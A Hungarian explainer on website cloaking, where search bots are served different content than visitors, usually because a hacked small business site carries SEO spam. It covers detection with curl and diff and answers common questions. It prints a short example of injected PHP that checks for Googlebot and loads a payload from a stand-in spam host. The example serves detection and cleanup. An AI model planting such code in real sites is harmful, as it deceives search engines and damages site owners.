A cloaking az, amikor egy oldal más tartalmat ad a keresőrobotnak, mint a valódi látogatónak. A szerver vagy a sablon megnézi, ki kér, és a user-agent vagy az IP-cím alapján eltérő HTML-t küld vissza.
Hogyan működik
A kiszolgáló minden kérésnél lát néhány azonosítót. A leggyakoribb a User-Agent fejléc, emellett az IP-cím és a Referer is szóba jön. A cloaking kód ezek alapján elágazik. Ha a kérő a Googlebot, kap egy tele kulcsszavas, linkfarmos változatot. Ha sima böngésző, kap egy ártalmatlan oldalt.
A lényeg, hogy a szándék nem mindig a tulajdonosé. A magyar KKV-oldalakon a cloaking szinte mindig feltörés eredménye, nem SEO-trükk. Egy SEO-spam feltörés tipikus utolsó lépése pont ez: a támadó elrejti a spamet a tulaj elől, de megmutatja a keresőnek.
Miért nem ugyanaz, mint a személyre szabás
A nyelvi vagy eszköz szerinti eltérés önmagában nem cloaking. A gond akkor kezdődik, ha a robot szisztematikusan mást lát, mint az ember. A határ egyszerű: ha kicseréled a user-agentet böngészőre, és eltűnik a tartalom fele, az cloaking. A nyelvi változatok vagy a reszponzív sablon nem ilyen.
Mit jelent az AI-korszakban
A generatív keresők és az AI-crawlerek ugyanúgy megkapják a bot-nézetet. Amit a támadó a Googlebotnak szán, azt beolvashatja a GPTBot vagy a ClaudeBot is. Onnantól a márkád neve mellé spam-szövegkörnyezet kerül a tréning- és keresési adatokban. Ezt sokkal nehezebb visszacsinálni, mint egy indexből kitakarítani a spam-oldalakat.
Röviden: ha a robot mást lát, mint a látogató, az nem beállítási kérdés, hanem incidens.
Miért fontos
Kereső-oldali következmény
A Google a cloakingot spam-szabálysértésnek tekinti. Manuális intézkedés járhat érte, és ilyenkor nem egy oldal, hanem az egész domain esik ki. A visszaépítés hónapokban mérhető, nem hetekben.
Biztonsági következmény
A cloaking nem hiba, hanem tünet. Ha a kódodban ilyen elágazás fut, azt valaki odatette. Ugyanaz a hozzáférés, amivel ezt beírták, alkalmas adatbázis-olvasásra és fájlfeltöltésre is. A biztonsági átvizsgálás ilyenkor nem opcionális.
Üzleti következmény
A spam-tartalom miatt az oldal bekerülhet a Safe Browsing listákra. A Chrome ekkor piros figyelmeztetést tesz a domain elé. A forgalom nullára esik órák alatt, és a levelezésed kézbesítése is romolhat.
A riportokban ezt látjuk: a tulajdonos hetekig nem vesz észre semmit, mert neki az oldal tökéletesen működik. Az első jel általában a Search Console értesítése vagy a hirtelen forgalomesés.
Technikai példa
Két lekérés, két user-agent. A különbség azonnal látszik:
curl -sA "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
https://pelda.hu/ > bot.html
curl -sA "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/120.0 Safari/537.36" https://pelda.hu/ > user.html
diff <(wc -c < bot.html) <(wc -c < user.html)
diff bot.html user.html | head -50
Ha a méretek között több tíz kilobájt az eltérés, az riasztó. Nézd meg a diff kimenetét soronként.
Egy tipikus beszúrt PHP-részlet így néz ki:
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos($ua, 'googlebot') !== false) {
echo file_get_contents('https://spam-szerver.example/payload.txt');
}
A minta mindig ugyanaz: user-agent vizsgálat, majd külső forrásból betöltött tartalom. Ha ilyet találsz a kódbázisban, az nem konfigurációs hiba.
Gyakori kérdések
Cloaking-e, ha mobilon más tartalmat adok, mint asztali gépen?
Nem, ha ugyanazt az elvet alkalmazod a robotra és a látogatóra is. A reszponzív és a külön mobil-sablon is rendben van. A gond akkor keletkezik, ha kifejezetten a bot azonosítója alapján cserélsz tartalmat. A robotnak azt kell látnia, amit az ugyanolyan eszközt használó ember lát.
Honnan tudom, hogy feltörték az oldalam, vagy a fejlesztő hagyott ott valamit?
Nézd meg a fájl módosítási dátumát és a verziókezelő naplóját. Ha az elágazás nincs a repóban, de a szerveren ott van, az beszúrt kód. A hozzáférési napló megmutatja, mikor és honnan írták be. Fejlesztői maradék ritkán tölt be tartalmat külső domainről.
A Google megbüntet, ha már kijavítottam?
Ha volt manuális intézkedés, a Search Console Manuális intézkedések menüpontjában látod. A takarítás után újravizsgálatot kérhetsz, és le kell írnod, mit csináltál. A feloldás általában napokat vesz igénybe. Ha nem volt intézkedés, a rangsor magától rendeződik, ahogy a Google újra feltérképezi az oldalt.
Elég, ha a spam-oldalakat eltávolítom az indexből?
Nem. Az eltávolítás csak a látható következményt szünteti meg, ráadásul ideiglenesen. Amíg a kiszolgáló eltérő tartalmat ad a botnak, a spam vissza fog kerülni. Először a kódot takarítsd, utána foglalkozz az indexszel.
Az AI-crawlerek is látják a rejtett tartalmat?
Igen, ha a cloaking kód általánosan a botokra szűr. Sok beszúrt kód egyszerűen minden nem böngésző user-agentre elágazik. Ilyenkor a GPTBot, a ClaudeBot és a PerplexityBot is a spam-változatot kapja. Ennek a nyoma sokkal tovább megmarad, mint a Google indexében.